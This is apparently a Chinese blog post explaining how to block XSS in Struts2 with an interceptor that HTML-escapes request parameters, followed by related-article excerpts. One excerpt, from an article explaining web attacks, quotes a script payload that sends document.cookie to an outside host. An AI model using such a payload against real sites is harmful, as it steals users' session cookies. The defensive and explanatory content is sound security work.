struts解决xss攻击

最新推荐文章于 2023-04-13 17:47:57 发布
最新推荐文章于 2023-04-13 17:47:57 发布
阅读量812 收藏 1
点赞数
分类专栏: Java 网络安全 文章标签: xss
原文链接:https://www.yisu.com/ask/1029.html
版权

struts解决xss攻击

struts解决xss攻击的方法:

1.采用struts2的拦截器过滤,将提交上来的参数转码来解决,例如配置struts.xml,代码如下:
下面展示一些 内联代码片

<package name="default" namespace="/" extends="struts-default, json-default">
    <!-- 配置拦截器 -->
    <interceptors>

      <!-- 定义xss拦截器 -->
      <interceptor name="xssInterceptor" class="...此处填写拦截器类名"></interceptor>

      <!-- 定义一个包含xss拦截的拦截栈 -->
      <interceptor-stack name="myDefault">
        <interceptor-ref name="xssInterceptor"></interceptor-ref>
        <interceptor-ref name="defaultStack"></interceptor-ref>
      </interceptor-stack>
    </interceptors>

    <!-- 这个必须配置,否则拦截器不生效 -->
    <default-interceptor-ref name="myDefault"></default-interceptor-ref>

    <action>
    ...此处省略n个action
    </action>
</package>

2.使用Java代码,拦截器实现类,例如:

import java.util.Map;
import org.apache.commons.lang3.StringEscapeUtils;
import com.opensymphony.xwork2.ActionContext;
import com.opensymphony.xwork2.ActionInvocation;
import com.opensymphony.xwork2.interceptor.AbstractInterceptor;

public class XssInterceptor extends AbstractInterceptor {
  @Override
  public String intercept(ActionInvocation invocation) throws Exception {
    // TODO Auto-generated method stub
    ActionContext actionContext = invocation.getInvocationContext();
    Map<String, Object> map = actionContext.getParameters();
    for (Map.Entry<String, Object> entry : map.entrySet()) {
      String value = ((String[])(entry.getValue()))[0];
      entry.setValue(StringEscapeUtils.escapeHtml4(value));//将提交上来的字符串进行转码
      //System.out.println((entry.getValue()));
    }
    return invocation.invoke();
  }
}
点滴进步
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSP Struts过滤xss攻击解决办法
01-08
JSP Struts过滤xss攻击解决办法 本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。 配置struts.xml <!-- 配置拦截器 --> <!-- 定义xss拦截器 -->
Java Struts2系列的XSS漏洞(S2-002)
合天网安学院
03-06 441
漏洞简介:Struts2-002 是一个 XSS 漏洞,该漏洞发生在 s:url 和 s:a 标签中,当标签的属性 includeParams=all 时,即可触发该漏洞。
struts防止xss攻击_软件工程师应该了解的Web攻击手段(上)
weixin_39605347的博客
12-06 54
前言明枪易躲,暗箭难防。——《独角牛》世界上什么人都有,有好人就会有坏人。在互联网也一样,总会存在一些小人来给自己的站点捣乱,因此,作为软件工程师,必须要了解一些Web攻击手段,做好必要防御措施,以免自己产品蒙受损失。常见攻击手段SQL注入SQL(Structured Query Language),恶意SQL语句攻击攻击方式:A者在目标网站的表单提交SQL语句参数。2. 服务端接收到SQL语句参...
跨站脚本漏洞
weixin_46729085的博客
09-08 3735
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
java struts2防止xss_拦截过滤防御XSS攻击 -- Struts2.3 以及 2.5 的解决方式
weixin_34481252的博客
02-13 624
使用Struts2框架开发的后台在防御XSS攻击的时候很多方式都不能用,因为Struts2对请求进行的二次封装有区别。以下针对Struts2的XSS攻击进行拦截过滤防御解决Struts2.3本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。配置struts.xml:...此处省略n个actionJava代码,拦截器实现类:importjava.util.Map;importorg...
struts2 预防xss攻击
weixin_42070436的博客
09-19 2080
struts2 预防xss攻击什么是XSS攻击举个例子代码 最近接触了一个比较老的项目用的ssh框架 甲方测试提出了这个xss漏洞 什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种...
Struts网站基于Filter的XSS漏洞修复
乔布斯基的博客
06-25 2029
1,关于XSS漏洞的知识,网上有很多文档,例如点击打开链接 2,关于XSS漏洞修复的知识也有很多,本文对本人修复XSS做下记录 3,Spring 中 XSS漏洞修复的可以参考 点击打开链接 4,但是以上方法仅仅适用于Spring 的修复,Struct有自己的拦截包装机制,完整的 Struct 中 Xss 漏洞修复,可以参考 点击打开链接 5,但是以上对Struct中Xss漏洞修复的代码有点
基于Struts2修复XSS漏洞(博主验证有效)
weixin_42210904的博客
07-21 1406
--------------------------------------------------------XSSFilter --------------------------------------------------- package com.itcast.filter; import com.itcast.utils.XssRequestWrappers; import javax.servlet.*; import javax.servlet.http.HttpServletReq.
防止XSS攻击解决办法
01-20
防止XSS攻击简单实用的解决办法,直接复制两个过滤器,然后配置web.xml即可实现
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
struts2漏洞解决
11-16
解决Struts2存在的重大后门BUG,并附带详细介绍文档
Java防止xss攻击附相关文件下载
08-25
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
Struts2 Xss 攻击预防的处理
hello world!
12-15 2835
摘要: 关于XSS问题的处理,此前在博客 http://blog.csdn.net/catoop/article/details/50338259 中写过处理方法。刚好最近朋友有问到“在Struts2中按文章中那样处理无效”,后来验证了下发现,Struts2 对请求的二次封装有所不同,于是针对Struts. 关于XSS问题的处理,此前在博客 http://blog.csdn.net/ca
Struts1.x 跨站脚本(XSS)漏洞的解决
weixin_33862514的博客
11-18 228
一. 演示XSS 当访问一个不存在的网址时,例如[url]http://localhost:8080/demo/noAction.do[/url],那么Struts处理后都会跳到提示“Invalid path /noAtcion.do was requested”的页面。 但如果我们访问的网址是[url]http://localhost:8080/demo/<s...
struts2】016/017漏洞、XSS漏洞【亲测有效】
litlow的博客
04-13 284
struts升级到2.5.30详细步骤【pom.xml文件修改Jar版本】【框架版本升级】struts2-2.3.15升到2.5.30。基于Struts2修复XSS漏洞。
网站常用攻击技术详解
热门推荐
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会..
Struts2.3 以及 2.5 过滤 xss攻击 的一种解决方案
huplion的专栏
10-09 1万+
本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。 配置struts.xml<package name="default" namespace="/" extends="struts-default, json-default"> <!-- 配置拦截器 --> <interceptors> <!-- 定义xss
Vue解决xss脚本攻击
最新发布
07-25
Vue 框架本身并不能直接解决 XSS(跨站脚本攻击)问题,但可以采取一些措施来减轻和防止这类攻击的发生。下面是一些常见的方法: 1. 使用模板语法:Vue 的模板语法会自动对插值进行 HTML 转义,这可以防止恶意脚本的执行。确保在插值表达式中使用双花括号 `{{ }}` 或 `v-text` 指令,而不是 `v-html` 指令。 2. 使用过滤器:Vue 的过滤器可以对数据进行处理和转义,例如使用内置的 `{{ text | filter }}` 语法或者通过全局过滤器。在过滤器中使用可信的 HTML 清理库,如 DOMPurify,对数据进行 XSS 过滤。 3. 使用第三方库:可以使用一些专门用于防止 XSS 攻击的第三方库,例如 vue-xss 或 DOMPurify。这些库提供了更强大的 XSS 过滤和安全性功能,可以在渲染数据之前进行过滤和清理。 4. 输入验证和过滤:在接收用户输入时,进行严格的输入验证和过滤。确保仅接受预期的数据类型和格式,并对用户输入进行适当的转义或过滤。 5. 安全 HTTP 头设置:在服务器端设置适当的 HTTP 头,如 Content-Security-Policy(CSP)和X-XSS-Protection,以帮助防止 XSS 攻击。 6. 定期更新依赖库:保持 Vue 及其相关依赖库的最新版本,以获取最新的安全修复和功能更新。 需要注意的是,以上方法只是减轻和防止 XSS 攻击的一些基本措施,不能保证100%的安全。在开发过程中,还应该密切关注安全性问题,并遵循最佳实践来保护应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值